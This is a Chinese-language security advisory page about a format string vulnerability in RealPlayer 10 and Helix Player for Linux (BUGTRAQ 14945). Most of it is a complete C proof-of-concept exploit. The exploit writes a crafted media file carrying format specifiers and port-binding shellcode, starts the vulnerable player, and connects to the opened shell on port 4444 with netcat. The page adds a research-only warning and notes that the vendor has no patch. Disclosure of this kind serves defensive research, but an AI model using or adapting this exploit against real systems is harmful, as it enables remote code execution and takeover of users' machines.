|
RealNetworks RealPlayer和Helix Player格式串处理漏洞 |
|
|
|
|
|
受影响系统:
Real Networks RealPlayer 10 Japanese
Real Networks RealPlayer 10 German
Real Networks RealPlayer 10 for Linux
Real Networks RealPlayer 10 English
Real Networks Helix Player for Linux 1.0.4
Real Networks Helix Player for Linux 1.0.3
Real Networks Helix Player for Linux 1.0.2
Real Networks Helix Player for Linux 1.0.1
Real Networks Helix Player for Linux 1.0
Real Networks RealPlayer For Unix 10.0.4
Real Networks RealPlayer For Unix 10.0.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 14945
RealPlayer和Helix Player都是非常流行的媒体播放器,支持多种媒体格式。
RealPlayer和Helix Player中存在格式串漏洞,远程攻击者可能利用此漏洞控制机器。
起因是没有正确的验证用户输入。远程攻击者可以利用这个漏洞直接向格式化打印函数提供格式说明符,导致执行任意代码。
<*来源:c0ntex (c0ntex@hushmail.com)
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFER 10000
#define EBPMSB 64105
#define HOST "localhost"
#define NETCAT "/bin/nc"
#define NOPS 0x90
#define STACKPOP 148
#define VULN "/usr/local/RealPlayer/realplay"
char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70";
/* metasploit port binding shellcode = 4444 */
char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
"\x58\x99\x89\xe1\xcd\x80\x96\x43\x52"
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a"
"\x66\x58\x50\x51\x56\x89\xe1\xcd\x80"
"\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
"\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a"
"\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
"\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
"\xe1\xcd\x80";
int
filegen(char *shellcode)
{
FILE *rp;
printf("[-] Creating file [%s]\n", filename);
rp = fopen(filename, "w");
if(!rp) {
puts("[!] Could not fopen file!");
free(shellcode);
return(EXIT_FAILURE);
}
printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", STACKPOP, EBPMSB);
fprintf(rp,
"<imfl>\n"
"<head\n"
"duration=\"1:33.7\"\n"
"timeformat=\"dd:hh:mm:ss.xyz\"\n"
"preroll=\"1:33.7\"\n"
"bitrate=\"1337\"\n"
"width=\"69\"\n"
"height=\"69\"\n"
"aspect=\"\"\n"
"url=\"http://www.open-security.org\"/>\n"
"<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/>\n"
"<fadein start=\"0\" duration=\"0:01\" target=\"2\"/>\n"
"</imfl>", EBPMSB, STACKPOP, shellcode);
fclose(rp);
free(shellcode); shellcode = NULL;
return(EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
char *shellcode = NULL;
puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer");
puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version");
puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n");
shellcode = (char *)malloc(BUFFER);
if(!shellcode) {
puts("[!] Could not malloc");
return(EXIT_FAILURE);
}
memset(shellcode, NOPS, BUFFER);
memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode));
shellcode[BUFFER] = '\0';
filegen(shellcode);
puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now...");
switch(fork()) {
case -1:
puts("[!] Could not fork off, bailing!");
return(EXIT_FAILURE);
case 0:
if(execl(VULN, "realplay", filename, NULL) <0) {
puts("[!] Could not execute realplayer... :(");
return(EXIT_FAILURE);
}
}
puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **");
sleep(10);
if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) {
puts("[!] Could not connect, check the core file!");
return(EXIT_FAILURE);
}
return(EXIT_SUCCESS);
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Real Networks
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.real.com
在百度中查找更多RealNetworks RealPlayer和Helix Player格式串处理漏洞 的内容
|
|
|
|
|
|
“ RealNetworks RealPlayer和Helix Player格式串处理漏洞 ”来源于网络,版权归作者所有!勿用于商业用途。 |
|
| |
本类阅读TOP10